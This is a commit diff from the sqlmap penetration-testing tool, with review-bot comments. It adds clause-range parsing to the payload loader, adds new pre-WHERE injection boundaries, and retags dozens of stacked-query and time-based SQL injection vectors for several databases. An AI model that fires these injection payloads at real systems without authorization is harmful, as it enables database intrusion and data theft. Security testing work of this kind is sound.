Cleaning a mess with stacked queries and pre-WHERE boundaries

This commit is contained in:
Miroslav Stampar 2018-09-14 10:30:58 +02:00
parent a5e3dce26f
commit 35d9ed8476
6 changed files with 89 additions and 49 deletions


@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.2.9.22"
VERSION = "1.2.9.23"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)


@ -6,6 +6,7 @@ See the file 'LICENSE' for copying permission
"""
import os
import re
from xml.etree import ElementTree as et
@ -17,6 +18,9 @@ from lib.core.exception import SqlmapInstallationException
from lib.core.settings import PAYLOAD_XML_FILES
def cleanupVals(text, tag):
if tag == "clause" and '-' in text:
text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text)
if tag in ("clause", "where"):
text = text.split(',')
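Review bot: The range expansion added to cleanupVals silently produces an empty clause list when the bounds are reversed — a `<clause>` of `8-1` expands to `''`, which the following `split(',')` turns into `['']` — so a typo in a payload XML disables or breaks that test without any diagnostic; what happens to that empty entry downstream is outside the hunk. Since the hunk header already imports SqlmapInstallationException, the lambda is better written as a small named helper that validates `low <= high` and raises that exception with the offending text, which also gives the regex callback a place for a comment. The regex `(\d+)-(\d+)` would also match inside longer tokens, so it is worth confirming that clause text can only ever contain digits, commas and dashes. cleanupVals's body continues past the end of the hunk.
```python
def cleanupVals(text, tag):
    if tag == "clause" and '-' in text:
        def _expandRange(match):
            # inclusive "low-high" range; reject reversed bounds instead of yielding ''
            low, high = int(match.group(1)), int(match.group(2))
            if low > high:
                errMsg = "invalid clause range '%s' in payload XML" % match.group(0)
                raise SqlmapInstallationException(errMsg)
            return ','.join(str(_) for _ in xrange(low, high + 1))

        text = re.sub(r"(\d+)-(\d+)", _expandRange, text)
    # … unchanged: remainder of cleanupVals …
```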


@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
1778dd902fbe5392377fd9b723898bbb lib/core/settings.py
4991b844fe999aba86dfd13a672c95b7 lib/core/settings.py
dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
248bd121e0565318e1efaff54aa427bc lib/core/target.py
@ -67,7 +67,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py
6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py
1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py
1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py
f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py
f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py
492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py
30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py
2b81435f5a7519298c15c724e3194a0d lib/request/basic.py
@ -471,13 +471,13 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml
d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml
817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml
de871ef9c982799a7f7f84621f103f26 xml/boundaries.xml
3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml
6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml
a279656ea3fcb85c727249b02f828383 xml/livetests.xml
fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml
1d5d2027cabbd1c9ff317d97ae8fe92a xml/payloads/boolean_blind.xml
0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml
92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml
ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
b148ef9ef70aaada9eb6e58ab1e384e1 xml/queries.xml


@ -413,6 +413,42 @@ Formats:
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>1</ptype>
<prefix>+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+</suffix>
</boundary>
<!-- End of pre-WHERE generic boundaries -->
<!-- Pre-WHERE derived table boundaries - e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
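Review bot: The new ptype 1 boundary with prefix `+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]` selects `[RANDSTR]` unquoted, whereas the three neighbouring ptype 2 boundaries select `'[RANDSTR]'`; an unquoted random string is parsed by the DBMS as an identifier rather than a literal, so this boundary would likely never yield a valid statement. If a numeric placeholder was intended for the numeric parameter type, `+(SELECT [RANDNUM] WHERE [RANDNUM]=[RANDNUM]` would match the convention of its siblings — worth checking against the ptype 1 boundaries above this hunk. The hunk header announces 36 added lines but fewer are shown here, so part of the addition may be out of view.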


@ -1386,7 +1386,7 @@ Tag: <test>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>
<request>
@ -1407,7 +1407,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>
<request>
@ -1428,7 +1428,7 @@ Tag: <test>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
<request>
@ -1449,7 +1449,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>
<request>
@ -1469,7 +1469,7 @@ Tag: <test>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
<request>
@ -1491,7 +1491,7 @@ Tag: <test>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</vector>
<request>
@ -1513,7 +1513,7 @@ Tag: <test>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>
<request>
@ -1533,7 +1533,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IIF([INFERENCE],1,1/0)</vector>
<request>
@ -1553,7 +1553,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>
<request>
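Review bot: The `<clause>` values changed from `0` to `1-8` rely on the range syntax that lib/parse/payloads.py now expands at load time, but nothing in the XML tells a reader that `1-8` is an inclusive range rather than a literal, and the file's header comment describing the `<clause>` values (outside these hunks) should say so. A one-line addition to that comment, e.g. `A clause value may also be an inclusive range such as 1-8 (expanded by lib/parse/payloads.py)`, would make the files self-describing. The same applies to every hunk in this file and to all hunks of the following file section (the stype 4/5 tests), where the four tests that previously listed `1,2,3,9` now also lose clause 9 — presumably intended given the commit title, but worth a word in the description since it removes those tests from pre-WHERE boundaries.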


@ -7,7 +7,7 @@
<stype>4</stype>
<level>2</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@ -28,7 +28,7 @@
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@ -48,7 +48,7 @@
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@ -69,7 +69,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@ -89,7 +89,7 @@
<stype>4</stype>
<level>3</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@ -109,7 +109,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@ -128,7 +128,7 @@
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -149,7 +149,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -169,7 +169,7 @@
<stype>4</stype>
<level>2</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@ -189,7 +189,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@ -208,7 +208,7 @@
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -230,7 +230,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -251,7 +251,7 @@
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request>
@ -273,7 +273,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request>
@ -294,7 +294,7 @@
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@ -314,7 +314,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@ -333,7 +333,7 @@
<stype>4</stype>
<level>2</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@ -353,7 +353,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@ -372,7 +372,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request>
@ -392,7 +392,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request>
@ -411,7 +411,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
<request>
@ -431,7 +431,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
<request>
@ -450,7 +450,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@ -470,7 +470,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@ -489,7 +489,7 @@
<stype>4</stype>
<level>3</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@ -510,7 +510,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@ -530,7 +530,7 @@
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
<request>
@ -551,7 +551,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
<request>
@ -571,7 +571,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>
@ -591,7 +591,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>
@ -610,7 +610,7 @@
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
@ -631,7 +631,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
@ -651,7 +651,7 @@
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
@ -672,7 +672,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>